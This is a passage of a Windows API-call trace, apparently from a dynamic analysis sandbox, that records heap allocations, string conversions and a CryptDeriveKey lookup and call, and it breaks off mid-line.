1 [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.627] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0195.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.628] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0195.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0195.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9e28, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0195.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.632] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0195.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0195.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0195.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0195.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0195.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0195.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0195.632] CryptDeriveKey (in: hProv=0xad6150, Algid=0x6601, hBaseData=0xaa57e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5960) returned 1 [0195.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0195.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0195.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0195.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0195.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0195.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0195.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0195.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0195.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0195.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0195.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0195.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0195.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0195.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0195.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0195.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0195.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0195.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0195.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0195.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0195.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0195.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0195.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0195.638] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0195.638] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0195.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.639] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0195.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0195.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0195.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.640] HeapFree (in: hHeap=0x25c0000, 